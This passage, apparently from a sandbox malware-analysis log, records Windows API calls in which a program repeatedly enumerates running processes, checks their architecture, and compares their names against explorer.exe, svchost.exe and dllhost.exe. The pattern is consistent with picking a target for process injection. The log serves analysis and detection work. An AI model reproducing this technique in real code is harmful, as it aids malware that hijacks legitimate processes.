th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0203.588] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0203.588] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0203.588] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0203.588] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0203.589] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0203.589] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0203.589] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb84) returned 0x0 [0203.589] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0203.590] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xec [0203.590] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0203.590] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0203.590] CloseHandle (hObject=0xec) returned 1 [0203.590] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0203.591] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xec [0203.591] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0203.591] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0203.591] CloseHandle (hObject=0xec) returned 1 [0203.591] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0203.698] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0203.698] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0203.698] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xec [0203.698] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0203.698] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0203.698] CloseHandle (hObject=0xec) returned 1 [0203.698] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0203.698] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0203.699] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xec [0203.699] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0203.699] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0203.699] CloseHandle (hObject=0xec) returned 1 [0203.699] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0203.700] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0203.700] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x954) returned 0xec [0203.700] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0203.700] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0203.700] CloseHandle (hObject=0xec) returned 1 [0203.700] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0203.701] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5b8) returned 0xec [0203.701] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0203.701] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0203.701] CloseHandle (hObject=0xec) returned 1 [0203.701] lstrcmpiA (lpString1="gtjtdfe", lpString2="explorer.exe") returned 1 [0203.701] lstrcmpiA (lpString1="gtjtdfe", lpString2="svchost.exe") returned -1 [0203.701] lstrcmpiA (lpString1="gtjtdfe", lpString2="dllhost.exe") returned 1 [0203.701] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0203.702] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5e4) returned 0x0 [0203.702] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 0 [0203.702] CloseHandle (hObject=0xe8) returned 1 [0203.702] Sleep (dwMilliseconds=0x3e8) [0204.731] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0204.733] Process32First (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0204.734] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0204.734] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0204.735] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0204.735] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0204.735] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0204.735] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0204.736] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0204.736] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0204.736] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0204.737] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0204.737] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0204.737] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0204.738] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0204.738] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0204.738] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0204.738] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0204.739] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0204.739] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0204.739] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0204.739] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0204.740] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0204.740] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0204.740] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0204.740] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0204.741] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0204.741] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0204.741] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0204.741] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0204.742] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0204.742] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0204.742] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0204.742] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0204.743] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0204.743] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0204.744] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0204.744] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0204.744] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xec [0204.744] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0204.744] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0204.744] CloseHandle (hObject=0xec) returned 1 [0204.744] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0204.745] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0204.745] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0204.745] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xec [0204.745] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0204.745] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0204.745] CloseHandle (hObject=0xec) returned 1 [0204.745] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0204.746] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0204.746] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0204.746] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0204.746] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0204.747] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xec [0204.747] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0204.747] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0204.747] CloseHandle (hObject=0xec) returned 1 [0204.747] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="explorer.exe") returned -1 [0204.747] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="svchost.exe") returned -1 [0204.747] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="dllhost.exe") returned -1 [0204.747] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0204.748] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xec [0204.748] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0204.748] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0204.748] CloseHandle (hObject=0xec) returned 1 [0204.748] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="explorer.exe") returned -1 [0204.748] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="svchost.exe") returned -1 [0204.748] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="dllhost.exe") returned -1 [0204.748] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0204.748] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xec [0204.748] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0204.749] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0204.749] CloseHandle (hObject=0xec) returned 1 [0204.749] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="explorer.exe") returned 1 [0204.749] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="svchost.exe") returned -1 [0204.749] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="dllhost.exe") returned 1 [0204.749] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0204.749] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xec [0204.749] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0204.749] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0204.749] CloseHandle (hObject=0xec) returned 1 [0204.750] lstrcmpiA (lpString1="definitely.exe", lpString2="explorer.exe") returned -1 [0204.750] lstrcmpiA (lpString1="definitely.exe", lpString2="svchost.exe") returned -1 [0204.750] lstrcmpiA (lpString1="definitely.exe", lpString2="dllhost.exe") returned -1 [0204.750] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0204.750] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xec [0204.750] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0204.750] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0204.750] CloseHandle (hObject=0xec) returned 1 [0204.750] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="explorer.exe") returned 1 [0204.750] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="svchost.exe") returned -1 [0204.750] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="dllhost.exe") returned 1 [0204.750] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0204.751] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xec [0204.751] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0204.751] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0204.751] CloseHandle (hObject=0xec) returned 1 [0204.751] lstrcmpiA (lpString1="whenever.exe", lpString2="explorer.exe") returned 1 [0204.751] lstrcmpiA (lpString1="whenever.exe", lpString2="svchost.exe") returned 1 [0204.751] lstrcmpiA (lpString1="whenever.exe", lpString2="dllhost.exe") returned 1 [0204.751] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0204.751] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xec [0204.752] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0204.752] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0204.752] CloseHandle (hObject=0xec) returned 1 [0204.752] lstrcmpiA (lpString1="potentially.exe", lpString2="explorer.exe") returned 1 [0204.752] lstrcmpiA (lpString1="potentially.exe", lpString2="svchost.exe") returned -1 [0204.752] lstrcmpiA (lpString1="potentially.exe", lpString2="dllhost.exe") returned 1 [0204.752] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0204.752] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xec [0204.752] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0204.752] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0204.752] CloseHandle (hObject=0xec) returned 1 [0204.752] lstrcmpiA (lpString1="seeker.exe", lpString2="explorer.exe") returned 1 [0204.752] lstrcmpiA (lpString1="seeker.exe", lpString2="svchost.exe") returned -1 [0204.752] lstrcmpiA (lpString1="seeker.exe", lpString2="dllhost.exe") returned 1 [0204.752] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0204.753] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xec [0204.753] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0204.753] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0204.753] CloseHandle (hObject=0xec) returned 1 [0204.753] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="explorer.exe") returned 1 [0204.753] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="svchost.exe") returned -1 [0204.753] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="dllhost.exe") returned 1 [0204.753] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0204.754] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xec [0204.754] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0204.754] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0204.754] CloseHandle (hObject=0xec) returned 1 [0204.754] 